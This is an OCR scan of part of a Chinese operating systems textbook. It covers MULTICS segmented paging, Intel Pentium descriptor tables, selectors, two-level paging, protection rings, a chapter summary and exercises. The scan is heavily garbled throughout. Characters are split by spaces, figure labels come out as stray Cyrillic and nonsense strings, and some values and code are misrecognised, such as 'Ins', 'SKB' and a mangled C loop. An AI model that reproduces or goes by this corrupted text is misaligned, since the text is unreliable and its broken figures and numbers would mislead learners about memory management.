存 中 。 如 果 一 个 段 在 内 存 中 ， 它 的 描述 b) 

符 将 包含 一 个 18 位 的 指向 它 的 页 表 的 指 图 3-35 MULTICS 的 虚拟 内 存 : a) 描述 符 段 指向 页 表 ， 
针 ( 见 图 3-35a)。 因 为 物理 地 址 是 24 位 b) 一 个 段 描述 符 ， 其 中 的 数字 是 各 个 域 的 长 度 
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并 且 页 面 是 按照 64 字 节 的 边界 对 齐 的 (这 隐 含 着 页 面 地 址 的 低 6 位 是 000000) ， 所 以 在 描述 符 中 只 需要 18 
位 来 存储 页 表 地 址 。 段 描述 符 中 还 包含 了 段 大 小 、 保 护 位 以 及 其 他 的 一 些 条 目 。 图 3-35b 一 个 MULTICS 
段 描述 符 的 示例 。 段 在 辅助 存储 器 中 的 地 址 不 在 段 描述 符 中 ， 而 是 在 缺 段 处 理 程序 使 用 的 另 一 个 表 中 。 

每 个 段 都 是 一 个 普通 的 虚拟 地 址 空间 ， 用 与 本 章 前 面 讨论 过 的 非 分 段 式 分 页 存储 相同 的 方式 进行 分 
页 。 一 般 的 页 面 大 小 是 1024 字 节 (尽管 有 一 些 MULTICS 自 己 使 用 的 段 不 分 页 或 以 64 字 节 为 单元 进行 分 
页 以 节省 内 存 )。 

MULTICS 中 一 个 地 址 由 两 部 分 构成 : 段 和 段 内 地 址 。 段 内 地 址 又 进一步 分 为 页 号 和 页 内 的 字 ， 如 
图 3-36 所 示 。 在 进行 内 存 访问 时 ， 执 行 下 面 的 算法 。 


D 根据 段 号 找到 段 描述 符 。 
2) 检查 该 段 的 页 表 是 否 在 内 存 中 。 如 果 在 ， 则 找到 它 的 位 置 ， 如 果 不 在 ， 则 产生 一 个 段 错误 。 如 果 

访问 违反 了 段 的 保护 要 求 就 发 出 一 个 越界 段 内 地 址 

错误 (陷阱)。 а 
D 检查 所 请 求 虚 拟 页 面 的 页 表 项 ， 如 RY ] Las | mess 

果 该 页 面 不 在 内 存 中 则 产生 一 个 缺 页 中 断 ， 四 О то 

如 果 在 内 存 就 从 页 表 项 中 取出 这 个 页 面 在 图 3-36 一 个 34 位 的 MULTICS 虚 拆 地 址 

内 存 中 的 起 始 地 址 。 
4) 把 偏 移 量 加 到 页 面 的 起 始 地 址 上 ， MULTICS 虚 拟 地址 

得 到 要 访问 的 字 在 内 存 中 的 地 址 。 as 页 号 | 偏 移 量 


5) 最 后 进行 读 或 写 操作 。 
这 个 过 程 如 图 3-37 所 示 。 为 了 简单 起 见 ， 
我 们 忽略 了 描述 符 段 自己 也 要 分 页 的 事实 。 
实际 的 过 程 是 通过 一 个 寄存 器 (描述 符 基 址 
寄存 器 ) 找到 描述 符 段 的 页 表 ， 这 个 页 表 指 
向 描述 符 段 的 页 面 。 一 旦 找到 了 所 需 段 的 描 : 
述 符 ， 寻 址 过 程 就 如 图 3-37 所 示 。 кз | р 
正如 读者 所 想 ， 如 果 对 于 每 条 指令 都 由 7 
操作 系统 来 运行 上 面 所 述 的 算法 ， 那 么 程序 
就 会 运行 得 很 慢 。 实 际 上 ，MULTICS 硬 件 包 图 3-37 两 部 分 组 成 的 MULTICS 地 址 到 内 存 地 址 的 转换 
含 了 16 个 字 的 高 速 TLB， 对 给 定 的 关键 字 它 
能 并 行 搜索 所 有 的 表 项 ， 如 图 3-38 所 示 。 当 一 
个 地 址 被 送 到 计算 机 时 ， 寻 址 硬件 首先 检查 这 个 表 项 是 
虚拟 地 址 是 不 是 在 TLB 中 。 如 果 在 ， 就 直接 比较 域 кы. 
从 TLB 中 取得 页 框 号 并 生成 要 访问 的 字 的 实 


页 框 


Шип WS 页 表 ДШ 


НД 生存 
as Йй пк P 时间 | 


КЕНЕ, АНАЕВ ЖЕР ЭСЕН. “Го г,» Та г 
TLB 中 保存 着 16 个 最 近 访 问 的 页 的 地 TEA ET | z t ий Т] 
址 ， 工 作 集 小 于 TLB 容 量 的 程序 将 贿 着 整个 = [з | [°[ 
工作 集 的 地 址 被 装 和 人 TLB 中 而 逐渐 达到 稳 C [| [о 
1 


定 ， 开 始 高 效 地 运行 。 如 果 页 面 不 在 TLB 中 ， 2 т |o | Rh 7 

会 访问 描述 符 和 页 表 以 找 出 页 框 号 ， 并 更 2 | Ге лан op 
新 TLB 使 它 包含 这 个 页 面 ， 最 近 最 少 使 用 的 [一 | 
页 面 被 淘汰 出 TLB。 生 存 时 间 位 跟踪 哪个 表 
项 是 最 近 最 少 使 用 的 。 之 所 以 使 用 TLB 是 为 图 3-38 一 个 简化 的 MULTICS 的 TLB， 两 个 页 面 

了 并 行 地 比较 所 有 表 项 的 段 号 和 页 号 。 大 小 的 存在 使 得 实际 的 TLB 更 复杂 
37.3 分 段 和 分 页 结合 : Intel Pentium 

Pentium 处 理 器 的 虚拟 内 存在 许多 方面 都 与 MULTICS 类 似 ， 其 中 包括 既 有 分 段 机 制 又 有 分 页 机 制 。 
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MULTICS 有 256K 个 独立 的 段 ， 每 个 段 最 长 可 以 有 64K 个 36 位 字 。Pentium 处 理 器 有 16K 个 独立 的 段 ， 每 
个 段 最 多 可 以 容纳 10 亿 个 32 位 字 。 这 里 虽然 段 的 数目 较 少 ， 但 是 相 比 之 下 Pentium 较 大 的 段 大 小 特征 比 
更 多 的 段 个 数 要 重要 得 多 ， 因 为 几乎 没有 程序 需要 1000 个 以 上 的 段 ， 但 是 有 很 多 程序 需要 大 段 。 
Pentium 处 理 器 中 虚拟 内 存 的 核心 是 两 张 表 ， 即 LDT (Local Descriptor Table， 局 部 描述 符 表 ) 和 GDT 
(Global Descriptor Table， 全 局 描述 符 表 )。 每 个 程序 都 有 自己 的 LDT， 但 是 同一 台 计算 机 上 的 所 有 程序 共享 一 
个 GDT。LDT 描 述 局 部 于 每 个 程序 的 段 ， 包 括 其 代码 、 数 据 、 堆 栈 等 ，GDT 描 述 系统 段 ， 包 括 操作 系统 本 身 。 
为 了 访问 一 个 段 ， 一 个 Pentium 程 序 必须 把 i 
这 个 段 的 选择 子 (selector) 装 入 机 器 的 6 个 段 寄 
存 器 的 某 一 个 中 。 在 运行 过 程 中 ，CS 寄 存 器 保存 
代码 段 的 选择 子 , DS 寄 存 器 保存 数据 段 的 选择 子 ， 
其 他 的 段 寄存 器 不 太 重要 。 每 个 选择 子 是 一 个 16 
位 数 ， 如 图 3-39 所 示 。 图 3-39 Pentium 处 理 器 中 的 选择 子 
选择 子 中 的 一 位 指出 这 个 段 是 局 部 的 还 是 全 
局 的 〈 即 它 是 在 LDT 中 还 是 在 GDT 中 ) 、 其 他 的 13 位 是 LDT 或 GDT 的 表 项 编号 。 因 此 ， 这 些 表 的 长 度 被 
限制 在 最 多 容纳 8K 个 段 描述 符 。 还 有 两 位 和 保护 有 关 ， 我 们 将 在 后 面 讨论 。 描 述 符 0 是 禁止 使 用 的 ， 它 
可 以 被 安全 地 装 入 一 个 段 害 存 器 中 用 来 表示 这 个 段 寄存 器 目前 不 可 用 ， 如 果 使 用 会 引起 一 次 陷阱 。 
在 选择 子 被 装 入 段 寄 存 器 时 ， 对 应 的 描述 符 被 从 LDT 或 GDT 中 取出 装 入 微 程序 寄存 器 中 ， 以 便 快速 
地 访问 。 一 个 描述 符 由 8 个 字 节 构成 ， 包 括 段 的 基地 址 、 大 小 和 其 他 信息 ， 如 图 3-40 所 示 。 


0=GDT/1 =LDT 特权 级 (0 一 3) 


0: 16 位 段 0: 段 不 在 内 存 中 
1: 32 位 段 H 1: 段 在 内 存 中 
ТКО | с 特权 级 (03) 
: Limit 以 字 节 为 单位 1 [ 0: 
1: Limit Ж 上 | АЯТ: 
| 全 -一 段 类 型 及 保护 
| Base 24—31 En EE s| туре Вазе 16—23 |, 
| Ваве 0—15 | ита 0-15 fo 
32 位 一 = 一 相对 地 址 


图 3-40 Pentium 处 理 器 代码 段 描述 符 (数据 段 稍 有 不 同 ) 


选择 子 的 格式 经 过 合理 设计 ， 使 得 根据 选择 子 定位 描述 符 十 分 方便 。 首 先 根据 第 2 位 选择 LDT 或 GDT， 
随后 选择 子 被 复制 进 一 个 内 部 擦 除 寄存 器 中 并 且 它 的 低 3 位 被 清 0， 最 后 ，LDT 或 GDT 表 的 地 址 被 加 到 它 上 
面 ， 得 出 一 个 直接 指向 描述 符 的 指针 。 例 如 ， 选 择 子 72 指 向 GDT 的 第 9 个 表 项 ， 它 位 于 地 址 GDT+72。 

现在 让 我 们 跟踪 一 个 描述 地 址 的 (选择 子 ， 偏 移 量 ) 二 元 组 被 转换 为 物理 地 址 的 过 程 。 微 程序 知道 
我 们 具体 要 使 用 哪个 段 寄存 器 后 ， 它 就 能 从 内 部 寄存 器 中 找到 对 应 于 这 个 选择 子 的 完整 的 描述 符 。 如 果 
段 不 存在 (选择 子 为 0) 或 已 被 换 出 ， 则 会 发 生 一 次 陷阱 。 

硬件 随后 根据 Limit (RKE) 域 检 查 偏 移 量 是 否 超出 了 段 的 结尾 ， 如 果 是 ， 也 发 生 一 次 陷阱 。 从 逻 
辑 上 来 说 ， 在 描述 符 中 应 该 简单 地 有 一 个 32 位 的 ET 
域 给 出 段 的 大 小 ， 但 实际 上 剩余 20 位 可 以 使 用 ， 
因此 采用 了 一 种 不 同 的 方案 。 如 果 Gbit 
(Granularity) 域 是 9， 则 是 精确 到 字 节 的 段 长 度 ， Í 
最 大 1MB， 如 果 是 1，Limit 域 以 页 面 替代 字 节 作为 
单元 给 出 段 的 大 小 。Pentium 处 理 器 的 页 面 大 小 是 
固定 的 4KB， 因 此 20 位 足以 描述 最 大 2” 字 节 的 段 。 

假设 段 在 内 存 中 并 且 偏 移 量 也 在 范围 内 ， 
Pentium 处 理 器 接着 把 描述 符 中 32 位 的 基 址 和 偏 移 


基 相 加 形成 线性 地 址 (linear address) ， 如 图 3-41 图 3-41 (选择 子 ， 偏 移 量 ) 对 转换 为 线性 地 址 
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所 示 。 为 了 和 只 有 24 位 基 址 的 286 兼 容 ， 基 址 被 分 为 3 片 分 布 在 描述 符 的 各 个 位 置 。 实 际 上 ， 基 址 允许 每 
个 段 的 起 始 地 址 位 于 32 位 线性 地 址 空间 内 的 任何 位 置 。 

如 果 禁 止 分 页 (通过 全 局 控制 寄存 器 中 的 一 位 ) ， 线 性 地 址 就 被 解释 为 物理 地 址 并 被 送 往 存储 器 用 
于 读 写 操作 。 因 此 在 禁止 分 页 时 ， 我 们 就 得 到 了 一 个 纯 的 分 段 方 案 。 各 个 段 的 基 址 在 它 的 描述 符 中 。 另 
外 ， 段 之 间 允 许 互相 覆盖 ， 这 可 能 是 因为 验证 所 有 的 段 都 互 不 重合 太 麻烦 太 费 时 间 的 缘故 。 

另 一 方面 ， 如 果 允 许 分 页 ， 线 性 地 址 将 通过 页 表 上 映射 到 物理 地 址 ， 很 像 我 们 前 面 讲 过 的 例子 。 这 里 
惟一 真正 复杂 的 是 在 32 位 虚拟 地 址 和 4KB 页 的 情况 下 ， 一 个 段 可 能 包含 多 达 100 万 个 页 面 ， 因 此 使 用 了 
一 种 两 级 映射 ， 以 使 在 段 较 小 时 减 小 页 表 大 小 。 

每 个 运行 程序 都 有 一 个 由 1024 个 32 位 表 项 组 成 的 页 目录 (раве directory)。 它 通过 一 个 全 局 寄存 器 
来 定位 。 这 个 目录 中 的 每 个 目录 项 都 指向 一 个 也 包含 1024 个 32 位 表 项 的 页 表 ， 页 表 项 指向 页 框 ， 这 个 方 
案 如 图 3-42 所 示 。 


线性 地 址 
位 ， 10 10 12 
目录 页 面 偏 移 量 
а) 
页 目录 页 表 页 框 i 
[ ] [ 1 所 选 
的 字 
| al 
1024 | 
t 偏 移 量 
Je 页 面 
| ! | | 


目录 项 指向 页 表 页 表 表 项 指 
向 字 


b) 
图 3-42 线性 地 址 到 物理 地 址 的 映射 


在 图 3-42a 中 我 们 看 到 线性 地 址 被 分 为 三 个 域 : 目录、 页 面 和 偏 移 量 。 目 录 域 被 作为 索引 在 页 目录 
中 找到 指向 正确 的 页 表 的 指针 ， 随 后 页 面 域 被 用 作 索 引 在 页 表 中 找到 页 框 的 物理 地 址 ， 最 后 ， 偏 移 量 被 
加 到 页 框 的 地 址 上 得 到 需要 的 字 节 或 字 的 物理 地 址 。 

每 个 页 表 项 是 32 位 ， 其 中 20 位 是 页 框 号 。 其 余 的 位 包含 了 由 硬件 设置 供 操作 系统 使 用 的 访问 位 和 
“ 脏 ” 位 、 保 护 位 和 一 些 其 他 有 用 的 位 。 

每 个 页 表 有 描述 1024 个 4KB 页 框 的 表 项 ， 因 此 一 个 页 表 可 以 处 理 4MB 的 内 存 。 一 个 小 于 4MB 的 段 的 
页 目录 中 将 只 有 一 个 表 项 ， 这 个 表 项 指向 一 个 惟一 的 页 表 。 通 过 这 种 方法 ， 长 度 短 的 段 的 开销 只 是 两 个 
页 面 ， 而 不 是 一 级 页 表 时 的 100 万 个 页 面 。 

为 了 避免 重复 的 内 存 访问 ，Pentium 处 理 器 和 MULTICS 一 样 ， 也 有 一 个 小 的 TLB 把 最 近 使 用 过 的 
“目录 -页 面 ”二 元 组 映射 为 页 框 的 物理 地 址 。 只 有 在 当前 组 合 不 在 TLB 中 时 ， 图 3-42 所 示 的 机 制 才 被 真 
正 执行 并 更 新 TLB。 只 要 TLB 的 缺失 率 很 低 ， 则 性 能 就 不 错 。 

还 有 一 点 值得 注意 ， 如 果 某 些 应 用 程序 不 需要 分 段 ， 而 是 需要 一 个 单独 的 、 分 页 的 32 位 地 址 空间 ， 
这 样 的 模式 是 可 以 做 到 的 。 这 时 ， 所 有 的 段 寄 存 器 可 以 用 同一 个 选择 子 设置 ， 其 描述 符 中 基 址 设 为 0， 
段 长 度 被 设置 为 最 大 。 指 令 偏 移 量 会 是 线性 地 址 ， 只 使 用 了 一 个 地 址 空间 一 一 效果 上 就 是 正常 的 分 页 。 
事实 上 ， 所 有 当前 的 Pentium 操 作 系统 都 是 这 样 工作 的 。OS/2 是 惟一 一 个 使 用 Intel MMU 体 系 结构 所 有 功 
能 的 操作 系统 。 

不 管 怎么 说 ， 我 们 不 得 不 称赞 Pentium 处 理 器 的 设计 者 ， 因 为 他 们 面 对 的 是 互相 冲突 的 目标 ， 实 现 
纯 的 分 页 、 纯 的 分 段 和 段 页 式 管理 ， 同 时 还 要 与 286 兼 容 ， 而 他 们 高 效 地 实现 了 所 有 的 目标 ， 最 终 的 设 
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计 非 常 简洁 。 
尽管 我 们 已 经 简单 地 讨论 了 Pentium 处 理 器 虚拟 内 存 的 全 部 体系 机 制 ， 关 于 保护 我 们 还 是 值得 再 说 


几 句 的 ， 因 为 它 和 虚拟 内 存 联系 很 紧密 。 和 虚拟 内 存 一 样 ， 


Pentium 处 理 器 的 保护 系统 与 MULTICS 很 类 似 。 它 支持 4 个 保护 级 的 
保护 级 ，0 级 权限 最 高 ，3 级 最 低 ， 如 图 3-43 所 示 。 在 任何 УС Аал 
时 刻 ， 运 行程 序 都 处 在 由 PSW 中 的 两 位 域 所 指出 的 某 个 保 ТЭА 
护 级 上 ， 系 统 中 的 每 个 段 也 有 一 个 级 别 。 

当 程序 只 使 用 与 它 同 级 的 段 时 ， 一 切 都 会 很 正常 。 对 
更 高 级 别 数据 的 存 取 是 允许 的 ， 但 是 对 更 低级 别 的 数据 的 


存 取 是 非法 的 并 会 引起 陷阱。 调用 不 同 级 别 (更 高 或 更 低 ) 
的 过 程 是 允许 的 ， 但 是 要 通过 一 种 被 严格 控制 的 方式 来 进 
行 。 为 执行 越级 调用 ，CALL 指 令 必须 包含 一 个 选择 子 而 
不 单单 是 一 个 地 址 。 选 择 子 指向 一 个 称 为 调用 门 (сап 
gate) 的 描述 符 ， 由 它 给 出 被 调用 过 程 的 地 址 。 因此， 要 а 
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只 有 正式 指定 的 人口 点 可 以 使 用 。 保 护 级 和 调用 门 的 概念 人 

来 自 MULTICS， 在 那里 它们 被 称 为 保护 环 (protection ring), 

这 个 机 制 的 一 种 典型 的 应 用 如 图 3-43 所 示 。 在 0 级 是 操作 系统 内 核 ， 处 理 JO、 TAERE ERIN 
操作 。 在 1 级 是 系统 调用 处 理 程序 ， 用 户 程 序 可 以 通过 调用 这 里 的 过 程 执行 系 统 调用 ， 但 是 只 有 - - 些 特定 
的 和 受 保护 的 过 各 可 以 被 调用 。 在 2 级 是 库 过 程 ， 它 可 能 是 由 很 多 正在 运行 的 程序 共享 的。 用户 程序 可 以 
调用 这 些 过 程 ， 读 取 它 们 的 数据 ， 但 是 不 能 修改 它们 。 最后， 运行 在 3 级 上 的 用 户 程序 受到 的 保护 最 少 

阴 阱 和 中 汤 使 用 了 一 种 和 调用 门类 似 的 机 制 。 它 们 访问 的 也 是 措 术 符 而 不 是 绝对 地 址 ， 而 且 这 些 入 
述 符 指向 将 被 执行 的 特定 的 过 程 。 图 3-40 中 的 Type 域 用 于 区 别 代码 段 、 数 据 段 和 各 种 类 型 的 站 


38 有 关 存 储 管理 的 研究 

存储 管理 ， 特 别 是 页 面 置换 算法 ， 曾 经 是 一 个 成 果 丰 硕 的 研究 领域 ， 但 这 些 成 果 中 大 部 分 好 像 已 经 
销声匿迹 了 ， 至 少 对 通用 系统 来 说 是 这 样 的 。 很 多 实时 系统 试图 使 用 时 钟 算法 的 某 些 变 体 ， 因 为 它 容易 
实现 而 且 相对 高 效 。 但 最 近 有 了 一 个 例外 ， 这 就 是 对 4.4 BSD 中 虚拟 内 存 的 重新 设计 (Cranor 和 Parulkar， 
1999), 

现在 仍 有 一 些 关于 新 式 系统 的 分 页 研究 在 进行 。 例 如 ， 手机 和 PDA 已 成 为 小 型 的 个 人 电脑 ， 其 中 很 
多 将 RAM 分 页 到 “磁盘 ”上 ， 所 不 同 的 是 手机 的 磁盘 是 闪存 ， 和 旋转 磁性 盘 相 比 有 不 同 的 特性 。 据 Park 
等 人 (2004b) 报道 (In 等 人 ，2007; Joo 等 人 ，2006; Part 等 人 ，2004a) 。Part 等 人 (2004b) 近期 的 一 
些 工作 还 着 眼 于 针对 移动 设备 的 能 源 敏感 型 的 需求 分 页 技术 。 

关于 分 页 性 能 的 研究 也 在 进行 (Albers 等 人 ，2002; Burton 和 Kelly，2003; Cascaval 等 人 ，2005; 
Panagiotou 和 Souza, 2006; Peserico，2003)。 研 究 的 兴趣 还 包括 对 多 媒体 系统 (Dasigenis 等 人 ，2001; 
Hand，1999) 和 实时 系统 (Pizlo 和 Vitek，2006) 的 存储 器 管理 。 


3.9 小 结 

本 章 中 我 们 考察 了 存储 管理 。 我 们 看 到 在 最 简单 的 系统 中 是 根本 没有 任何 交换 或 分 页 的 。- 量 一 个 
程序 装 和 内存， 它 将 一 直 在 内 存 中 运行 直到 完成 。 一 些 操作 系统 在 同 一 时 刻 只 允许 一 个 进程 在 内 存 中 运 
行 ， 而 另 一 些 操作 系统 支持 多 道 程序 设计 。 - 

接 下 来 是 交换 技术 。 系统 通过 交换 技术 可 以 同时 运行 总 内 存 占用 超过 物理 内 存 大 小 的 多 个 进程 ， 如 
果 一 个 进程 没有 内 存 空间 可 用 ， 它 将 会 被 换 到 磁盘 上 。 内 存 和 磁盘 上 的 空闲 空间 可 以 使 用 位 图 或 空闲 区 
列表 来 记录 。 

现代 计算 机 都 有 某 种 形式 的 虚拟 内 存 。 在 最 简单 的 形式 中 ， 每 一 个 进程 的 地 址 空间 被 划分 为 同等 大 
小 的 块 ， 称 为 页 面 ， 页 面 可 以 被 放 和 人 内存 中 任何 可 用 的 页 框 内 。 有 多 种 页 面 置换 算法 ， 其 中 两 个 比较 好 
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的 算法 是 老化 算法 和 工作 集 时 钟 算法 。 


为 了 使 分 页 系统 工作 良好 ， 仅 选择 算法 是 不 够 的 ， 还 要 关注 诸如 工作 集 的 确定 、 存 储 器 分 配 策略 以 


及 所 需要 的 页 面 大 小 等 问题 。 


分 段 可 以 帮助 处 理 在 执行 过 程 中 大 小 有 变化 的 数据 结构 ， 并 能 简化 连接 和 共享 。 分 段 还 有 利于 为 不 
同 的 段 提供 不 同 的 保护 。 有 时 ， 可 以 把 分 段 和 分 页 结合 起 来 ， 以 提供 一 种 二 维 的 虚拟 内 存 ，MULTICS 
系统 以 及 Intel Pentium 都 是 这 样 既 支持 分 段 也 支持 分 页 的 系统 。 


习题 


1. 在 图 3-3 中 基 址 和 界限 寄存 器 含有 相同 的 值 
16 384， 这 是 巧合 ， 还 是 它们 总 是 相等 ? 如 果 这 
只 是 巧合 ， 为 什么 在 这 个 例子 里 它们 是 相等 的 ? 

.交换 系统 通过 紧缩 来 消除 空 亲 区。 假设 有 很 多 
空闲 区 和 数据 段 随机 分 布 ， 并 且 读 或 写 32 位 长 
的 字 需 要 10ns 的 时 间 ， 紧 缩 128MB 大 概 需要 多 
长 时 间 ? 为 了 简单 起 见 , 假设 空闲 区 中 含有 字 0， 
内 存 中 最 高 地 址 处 含有 有 效 数据 。 

“请 比较 用 位 图 和 链表 两 种 方法 来 记录 空闲 内 存 
所 需 的 存储 空间 。128MB 的 内 存 以 mn 字 节 为 单元 
分 配 ， 对 于 链表 ， 假 设 内 存 中 数据 段 和 空间 区 
交替 排列 ， 长 度 均 为 64KB。 并 假设 链表 中 的 每 
个 结 点 需要 32 位 的 内 存 地 址 、16 位 长 度 和 16 位 
下 一 结 点 域 。 这 两 种 方法 分 别 需 要 多 少 字 节 的 
存储 空间 ? 哪 种 方法 更 好 ? 

:在 一 个 交换 系统 中 ， 按 内 存 地 址 排列 的 空闲 区 
大 小 是 : 10KB, 4KB, 20KB, 18КВ, 7КВ, 
9KB、12KB 和 15KB。 对 于 连续 的 段 请 求 :a) 
12KB; b) 10КВ, с) 9KB。 使 用 首次 适 配 算法 ， 
将 找 出 哪个 空闲 区 ? 使 用 最 佳 适 配 、 最 差 适 配 、 
下 次 适 配 算法 呢 ? 

.对 下 面 的 每 个 十 进 制 虚拟 地 址 ， 分 别 使 用 4KB 
页 面 和 8KB 页 面 计算 虚拟 页 号 和 偏 移 量 : 20000, 
32768, 60000, 

-Intel 8086 处 理 器 不 支持 虚拟 内 存 ， 然 而 一 些 公 
司 曾经 设计 过 包含 未 作 任何 改动 的 8086 CPU 的 

分 页 系统 。 猜 想 一 下 ， 他 们 是 如 何 做 到 这 一 点 

的 。 提 示 ， 考虑 MMU 的 逻辑 位 置 。 

考虑 下 面 的 C 程 序 : 

int ХМ}; 


~ 


ы 


> 


的 


е 


ab 


/1M 是 某 个 预定 义 的 常量 

ii< N;i+= step) ХШ = Х + 1; 

а) 如 果 这 个 程序 运行 在 一 个 页 面 大 小 为 4KB 且 
有 64 个 TLB 表 项 的 机 器 上 时 ，M 和 N 取 什么 
值 会 使 得 内 层 循环 的 每 次 执行 都 会 引起 TLB 
失效 ? 

b) 如 果 循 环 重复 很 多 遍 ， 结 果 会 和 a) 的 答案 相 
同 吗 ? 请 解释 。 


8. 存储 页 面 必 须 可 用 的 磁盘 空间 和 下 列 因素 有 关 : 
最 大 进程 数 "， 虚 拟 地 址 空间 的 字 节 数 v，RAM 
的 字 节 数 r。 给 出 最 坏 情况 下 磁盘 空间 需求 的 表 
达 式 。 这 个 数量 的 真实 性 如 何 ? 

9. 一 个 机 器 有 32 位 地 址 空间 和 8KB 页 面 ， 页 表 完 
全 用 硬件 实现 ， 页 表 的 每 一 表 项 为 一 个 32 位 字 。 
进程 启动 时 ， 以 每 个 字 100ns 的 速度 将 页 表 从 内 
存 复制 到 硬件 中 。 如 果 每 个 进程 运行 100 ms 
(包含 装 入 页 表 的 时 间 )， 用 来 装 入 页 表 的 CPU 
时 间 的 比例 是 多 少 ? 

10. 假设 一 个 机 器 有 48 位 的 虚拟 地 址 和 32 位 的 物理 
地 址 。 

а) 假设 页 面 大 小 是 4KB， 如 果 只 有 一 级 页 表 ， 
那么 在 页 表 里 有 多 少 页 表 项 ?请 解释 。 

b) 假设 同一 系统 有 32 个 TLB 表 项 ， 并 且 假 设 一 
个 程序 的 指令 正好 能 放 入 一 个 页 ， 并 且 该 程 
序 顺 序 地 从 有 数 千 个 页 的 数组 中 读 取 长 整 型 
元 素 。 在 这 种 情况 下 TLB 的 效果 如 何 ? 

11. 假设 一 个 机 器 有 38 位 的 虚拟 地 址 和 32 位 的 物理 
地 址 。 

а) 与 一 级 页 表 比 较 ， 多 级 页 表 的 主要 优点 是 什 
么 ? 

b) 一 个 有 16KB 个 页 、4 字 节 表 项 的 二 级 页 表 ， 
应 该 对 第 一 级 页 表 域 分 配 多 少 位 ， 对 第 二 级 
页 表 域 分 配 多 少 位 ?请 解释 原因 。 

12. 一 个 32 位 地 址 的 计算 机 使 用 两 级 页 表 。 虚 拟 地 
址 被 分 成 9 位 的 顶级 页 表 域 、11 位 的 二 级 页 表 
域 和 一 个 偏 移 量 ， 页 面 大 小 是 多 少 ? 在 地 址 空 
间 中 一 共有 多 少 个 页 面 ? 

13. 假设 一 个 32 位 虚拟 地 址 被 分 成 a、b、c、d 四 个 
域 。 前 三 个 域 用 于 一 个 三 级 页 表 系 统 ， 第 四 个 
域 4 是 偏 移 量 。 页 面 数 与 这 四 个 域 的 大 小 都 有 
关系 吗 ? 如 果 不 是 ， 与 嘟 些 因素 有 关 以 及 与 哪 
些 因 素 无 关 ? 

14. 一 个 计算 机 使 用 32 位 的 虚拟 地 址 ，4KB 大 小 的 
页 面 .程序 和 数据 都 位 于 最 低 的 页 面 (0~4095)， 
堆栈 位 于 最 高 的 页 面 。 如 果 使 用 传统 (一 级 ) 
分 页 ， 页 表 中 需要 多 少 个 表 项 ? 如 果 使 用 两 级 
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分 页 ， 每 部 分 有 10 位 ， 需 要 多 少 个 页 表 项 ? 

15. 一 台 计算 机 的 进程 在 其 地 址 空间 有 1024 个 页 
面 ， 页 表 保 存在 内 存 中 。 从 页 表 中 读 取 一 个 字 
的 开销 是 5ns。 为 了 减 小 这 一 开销 ， 该 计算 机 
使 用 了 TLB， 它 有 32 个 (虚拟 页 面 , 物理 页 框 ) 
对 ， 能 在 Ins 内 完成 查找 。 请 问 把 平均 开销 降 
到 2ns 需 要 的 命中 率 是 多 少 ? 

16. YAX 机 中 的 TLB 中 没有 包含 R 位 ， 为 什么 ? 

17. TLB 需 要 的 相 联 存储 设备 如 何 用 硬件 实现 ， 这 
种 设计 对 扩展 性 意味 着 什么 ? 

18. 一 台 机 器 有 48 位 虚拟 地 址 和 32 位 物理 地 址 ， 页 
面 大 小 是 8KB， 试 问 页 表 中 需要 多 少 个 表 项 ? 
19. 一 个 计算 机 的 页 面 大 小 为 SKB， 内 存 大 小 为 
256KB ， 虚 拟 地 址 空间 为 64GB ， 使 用 倒 排 页 
表 实 现 虚 拟 内存 。 为 了 保证 平均 散 列 链 的 长 度 
小 于 1， 散 列表 应 该 多 大 ? 假设 散 列表 的 大 小 

为 2 的 震 。 

20. 一 个 学 生 在 编译 器 设计 课程 中 向 教授 提议 了 一 
AMEH: 编写 一 个 编译 器 ， 用 来 产生 页 面 访问 
列表 , 该 列表 可 以 用 于 实现 最 优 页 面 置换 算法 。 
试问 这 是 否 可 能 ?为 什么 ? 有 什么 方法 可 以 改 
进 运行 时 的 分 页 效率 ? 

21. 假设 虚拟 页 码 索引 流 中 有 一 些 长 的 页 码 索引 序 
列 的 重复 ， 序 列 之 后 有 时 会 是 一 个 随机 的 页 码 
索引 。 例 如 ， 序 列 0，1，…，511，431，0， 
1，.…，511，332，0，1，.… 中 就 包含 了 0， 
1，…，511 的 重复 ， 以 及 跟随 在 它们 之 后 的 随 
机 页 码 索引 431 和 332。 

а) 在 工作 负载 比 该 序列 短 的 情况 下 ， 标 准 的 页 
面 置换 算法 (LRU, FIFO, Clock) 在 处 理 
换 页 时 为 什么 效果 不 好 ? 

b) 如 果 一 个 程序 分 配 了 500 个 页 框 ， 请 描述 一 
个 效果 优 于 LRU、FIFO 或 Clock 算 法 的 页 面 
置换 方法 。 

22. 如 果 将 FIFO 页 面 置 换算 法 用 到 4 个 页 框 和 8 个 
页 面 上 ， 若 初始 时 页 框 为 空 ， 访 问 字符 申 为 
0172327103， 请 问 会 发 生 多 少 次 缺 页 中 断 ? 如 
果 使 用 LRU 算 法 呢 ? 

23. 考虑 图 3-15b 中 的 页 面 序列 。 假 设 从 页 面 B 到 页 
面 A 的 R 位 分 别 是 11011011。 使 用 第 二 次 机 会 
算法 ， 被 移 走 的 是 哪个 页 面 ? 

24. 一 台 小 计算 机 有 4 个 页 框 。 在 第 一 个 时 钟 滴答 
时 R 位 是 0111 (页 面 0 是 0， 其 他 页 面 是 1) ， 在 
随后 的 时 钟 滴答 中 这 个 值 是 1011、1010、1101、 
0010、1010、1100、0001。 如 果 使 用 带 有 8 位 


25. 


26. 


27. 


2 


® 


29. 


计数 器 的 老化 算法 ， 给 出 最 后 一 个 滴答 后 4 个 
计数 器 的 值 。 

请 给 出 一 个 页 面 访问 序列 ， 其 第 一 个 被 选择 置 
换 的 页 面 必须 不 同 于 Clock 和 LRU 算 法 。 假 设 
一 个 进程 分 配 了 3 个 页 框 ， 访 问 串 中 的 页 号 属 
于 集合 0，1，2，3。 

在 图 3-21c 的 工作 集 时 钟 算法 中 ， 表 针 指 向 那 
个 R=0 的 页 面 。 如 果 r= 400， 这 个 页 面 将 被 
移出 吗 ? 如 果 r= 1000 呢 ? 

把 一 个 64KB 的 程序 从 平均 寻 道 时 间 10ms、 旋 
转 延迟 时 间 10ms、 每 磁道 32KB 的 磁盘 上 装 入 ， 
对 于 下 列 页 面 大 小 分 别 需要 多 少时 间 ? 

а) 页 面 大 小 为 2KB 。 

b) 页 面 大 小 为 4KB 。 

假设 页 面 随机 地 分 布 在 磁盘 上 ， 柱 面 的 数目 非 
常 大 以 至 于 两 个 页 面 在 同一 个 柱 面 的 机 会 可 以 
忽略 不 计 。 


-一 个 计算 机 有 4 个 页 框 ， 装 和 时间 、 上 次 访问 


